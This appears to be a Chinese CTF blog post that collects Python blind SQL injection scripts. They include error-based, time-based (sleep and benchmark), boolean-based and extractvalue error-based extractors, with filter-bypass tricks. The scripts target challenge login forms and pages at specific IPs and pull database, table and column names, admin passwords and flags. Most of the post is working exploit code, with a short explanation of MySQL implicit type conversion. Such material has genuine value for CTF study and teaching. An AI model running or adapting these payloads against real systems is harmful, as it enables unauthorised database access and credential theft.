blind_SQL_injection script

就是突然觉得收集一些脚本,而不是丢掉,这样会让自己做题效率高很多,所以把作过的题目的脚本都收集起来吧。

简单的盲注脚本,根据错误信息判断

#coding:utf-8
import requests
# Target login form of the challenge, and the alphabet tried at every
# character position.  '*' is deliberately the last candidate: the driver
# loop below treats reaching it as "nothing more to extract".
url = "http://58.154.33.13:8002/login.php"
payloads = (
    "1234567890"
    "qwertyuiopasdfghjklzxcvbnm"
    "_@"
    "QWERTYUIOPASDFGHJKLZXCVBNM"
    ",*"
)
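def exp(i, x):
    """Return 1 if character *i* (1-based) of the extracted value equals *x*, else 0.

    Error-message oracle: the injected ``if(<guess>, 0, 1)`` turns the WHERE
    clause false exactly when the guess is right, so the login lookup finds no
    user and the application answers with its "wrong username" text.  The
    earlier enumeration stages (database name, table names, column names) are
    kept as comments; only the final password extraction is live.

    Reads the module-level ``url``.  Only use against CTF/lab hosts you are
    authorized to test.
    """
    # Stage 1-3 payloads, left for reference:
    # "' or if(substring((select database()) from %s for 1)='%s',0,1) and '1'='1"
    # "' or if(substring((select group_concat(table_name) from information_schema.columns where table_schema=database()) from %s for 1)='%s',0,1) and '1'='1"
    # "' or if(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin') from %s for 1)='%s',0,1) and '1'='1"
    xx = "' or if(substring((select group_concat(password) from admin) from %s for 1)='%s',0,1) and '1'='1"
    data = {'username': xx % (i, x), 'password': '123'}
    # A timeout keeps one hung connection from stalling the whole extraction.
    response = requests.post(url, data=data, timeout=10)
    # `in` instead of `.find(...) > 0`: find() returns 0 when the marker is the
    # very first thing in the body, which the old comparison treated as a miss.
    # `.text` (not `.content`) so this also works on Python 3, where .content
    # is bytes and a str marker could never match.
    if u'用户名错误' in response.text:
        return 1
    return 0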
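ans = ''
print('star')
# Recover the value one position at a time (1-based, as MySQL's substring()
# expects), keeping the first candidate the oracle confirms at each position.
for i in range(1, 100):
    for x in payloads:
        if exp(i, x) == 1:
            ans += x
            print(ans)
            break
    # '*' is the last candidate, so x == '*' after the inner loop means either
    # the alphabet was exhausted or '*' itself matched: nothing more to read.
    if x == '*':
        print("over")
        break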

如果改成基于时间的盲注的话,则只需将上方的 exp 改成如下(注意还需要 `import time`;另外网络延迟可能把正常请求也拖过阈值造成误判,阈值要给 sleep 时间留够余量):

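def exp(i, x):
    """Time-based variant: return 1 if character *i* of the value is *x*, else 0.

    The injected ``if(<guess>, sleep(5), 0)`` delays the response by roughly
    five seconds only when the guess is right, so a round trip longer than
    four seconds is counted as a hit.  Drop-in replacement for the first
    ``exp``: same signature, reads the module-level ``url``.  Only use against
    CTF/lab hosts you are authorized to test.
    """
    import time  # the original listing never imports time; keep this self-contained
    xx = "' or if(substring((select database()) from %s for 1)='%s',sleep(5),0)"
    data = {'username': xx % (i, x), 'password': '123'}
    first_time = time.time()
    # The timeout must comfortably exceed sleep(5), otherwise every correct
    # guess would surface as a timeout error instead of a hit.
    requests.post(url, data=data, timeout=30)
    elapsed = time.time() - first_time
    # NOTE(review): a congested link can push an unrelated request past 4 s and
    # produce a false positive that corrupts every later position; re-verify
    # hits if the recovered string looks wrong.
    if elapsed > 4:
        return 1
    return 0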

或者

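def exp(i, x):
    """CPU-delay variant: return 1 if character *i* of the value is *x*, else 0.

    Same idea as the sleep() version, but the delay comes from
    ``benchmark(10000000, md5('test'))``, which still works when ``sleep`` is
    filtered.  This one targets a different challenge: the injection point is
    the ``id`` POST field and the data lives in ``users233.p4sswo3d``.  Reads
    the module-level ``url``.  Only use against CTF/lab hosts you are
    authorized to test.
    """
    import time  # keep the function self-contained; the caller may not import it
    # Earlier stages (database, tables, columns), kept for reference:
    # "' or if(substring((select database()) from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    # "' or if(substring((select group_concat(table_name) from information_schema.columns where table_schema=database()) from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    # "' or if(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users233') from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    xx = "' or if(substring((select group_concat(p4sswo3d) from users233) from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    data = {'id': xx % (i, x)}
    first_time = time.time()
    # Timeout well above the expected benchmark() delay so real hits are not
    # reported as connection errors.
    requests.post(url, data=data, timeout=30)
    elapsed = time.time() - first_time
    # NOTE(review): benchmark() cost scales with server load, so the 2 s
    # threshold may need tuning.  Every hit also burns real CPU on the target;
    # keep the iteration count as low as the oracle allows.
    if elapsed > 2:
        return 1
    return 0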

布尔语句的盲注脚本

import requests
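# Boolean-based blind injection for a form that filters ',', whitespace,
# and/or/union/like, etc.: substr(... from N) replaces the comma form,
# parentheses replace spaces, and the whole username becomes an arithmetic
# expression (see the explanation below the listing for why a correct guess
# yields the "password" error).  Only use against CTF/lab hosts you are
# authorized to test.
url = "http://218.76.35.74:20130/login.php"
unameq = "admin'-(ascii(substr((select(group_concat(passwd))from(admin))from("
password = ''
for i in range(1, 50):
    for j in range(1, 128):
        # Full payload: admin'-(ascii(substr(...from(i)))=j)-'-1
        uname = unameq + str(i) + ")))=" + str(j) + ")-'-1"
        data = {'uname': uname, 'passwd': '123'}
        # Timeout so a single hung connection cannot stall the run.
        r = requests.post(url=url, data=data, timeout=10)
        if 'password' in r.text:
            password += chr(j)
            print(password)
            break
    # j is still 127 only when no code point 1..126 matched, i.e. the value
    # is complete (or its next character is outside the range this loop
    # can test).
    if j == 127:
        print("完成!")
        # Same effect as exit(0) without relying on the site-module helper.
        raise SystemExit(0)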

条件:

  1. 密码错误或者用户名错误返回信息
  2. 过滤了 `,`、`|`、`&`、`and`、`or`、`union`、`like`、`*` 以及所有空白符等(所以用 `substr(... from N)` 代替带逗号的 `substr(x,N,1)`,用括号代替空格)

这里用到了 MySQL 的隐式类型转换:字符串参与算术运算时会被转成数字,不以数字开头的字符串转成 0(和 PHP 的弱类型比较类似),比如 `'admin'-'-1'` 的结果是 `0-(-1)=1`。因此上面 payload 中 username 的比较值实际是 `0-(条件)-(-1)=1-条件`:条件为真时等于 0,为假时等于 1。我还试了把 username 这一列改成 int 类型,结果还是一样。

猜测后台脚本应该是先判断用户名,再判断密码。所以上面这个脚本如果命中的话,查询结果会把所有不以数字开头的用户名都返回,然后返回密码错误。如果没命中的话,就会返回用户名错误

第三届上海大学生网络安全赛盲注题

payload如下:

#coding:utf-8
import requests
import urllib
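def exp(i, x):
    """Return 1 if character *i* (1-based) of the value has ASCII code *x*, else 0.

    Boolean-based oracle with ``and`` and ``=`` filtered: ``&&`` (sent
    URL-encoded as ``%26%26``) stands in for ``and``, ``like`` for ``=``, and
    equality is tested as ``ascii(...) - x`` being zero, which makes the
    ``&&`` false.  ``+`` is a space in the query string.  The page normally
    contains "Hello Hacker!!"; the code treats its absence as the hit.  The
    earlier enumeration stages are kept as comments.  Only use against
    CTF/lab hosts you are authorized to test.
    """
    url = 'http://0d2c92830f414f70ae4739aa450aec00fd79f6f552734def.game.ichunqiu.com/index.php?id='
    # Stage 1-3 payloads, left for reference:
    # "1+%26%26+ascii(substring((select+database())+from+" + str(i) + "+for+1))-" + str(x)
    # "1+%26%26+ascii(substring((select+table_name+from+information_schema.columns+where+table_schema+like+database()+limit+1)+from+" + str(i) + "+for+1))-" + str(x)
    # "1+%26%26+ascii(substring((select+column_name+from+information_schema.columns+where+table_name+like+%22f14g%22+limit+1)+from+" + str(i) + "+for+1))-" + str(x)
    xx = "1+%26%26+ascii(substring((select+f14g+from+words.f14g)+from+" + str(i) + "+for+1))-" + str(x)
    # Timeout so one hung request cannot stall the whole extraction.
    response = requests.get(url=url + xx, timeout=10)
    # `in` rather than `.find(...) > 0` (which missed a marker at offset 0),
    # and `.text` rather than `.content` so the str marker also matches on
    # Python 3 where .content is bytes.
    if 'Hello Hacker!!' in response.text:
        return 0
    return 1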
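ans = ''
print('star')
for i in range(1, 100):
    # Printable ASCII candidates, one request each.
    for x in range(32, 127):
        if exp(i, x) == 1:
            ans += chr(x)
            print(ans)
            break
    else:
        # No printable character matched at this position: the value is
        # exhausted (substring() past the end yields '' and never matches),
        # or the next character is outside 32..126, which this alphabet
        # cannot recover anyway.  Stopping here saves 95 requests for every
        # remaining position.
        break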

过滤了 `and` 和 `=`:用 `&&`(URL 编码为 `%26%26`)代替 `and`,用 `like` 代替 `=`;URL 里的 `+` 表示空格。

上面这题也可以用报错注入来做,脚本如下:

import requests
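# Error-based extraction for the same challenge: extractvalue() raises an
# XPATH syntax error whose text echoes the colon-prefixed (0x3a) value, so
# each request leaks a whole substring instead of one boolean.  Only use
# against CTF/lab hosts you are authorized to test.
flag = ''
base = "http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.com/index.php?id="
# Enumeration stages, kept for reference ({} is the LIMIT offset):
# "extractvalue(1,%20concat(0x3a,(select%20schema_name from information_schema.schemata limit {},1)))"
# "extractvalue(1,%20concat(0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema like 0x776f726473%20limit%20{},1)))"
# "extractvalue(1,%20concat(0x3a,(select%20column_name%20from%20information_schema.columns%20where%20table_name like 0x66313467 limit%20{},1)))"
# 0x776f726473 is 'words' and 0x66313467 is 'f14g': hex literals avoid quotes.
for i in range(50):
    # substring() offsets are 1-based, so i == 0 yields '' and adds nothing;
    # the range starts at 0 because the LIMIT-based stages above need it.
    url = base + "extractvalue(1,%20concat(0x3a,(select substring((select%20f14g from f14g),{},1))))".format(i)
    # `.text` rather than `.content` so the str split also works on Python 3.
    parts = requests.get(url, timeout=10).text.split(':')
    if len(parts) < 3:
        # No XPATH error text in the page (query blocked or behaviour
        # changed): stop cleanly instead of dying with an IndexError.
        print("no error text in response, stopping at offset %d" % i)
        break
    flag = flag + parts[2].replace('\'', '')
    print(flag)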


以上就是一些没有过滤的时候的盲注脚本,以后会陆续添加有一些过滤的脚本
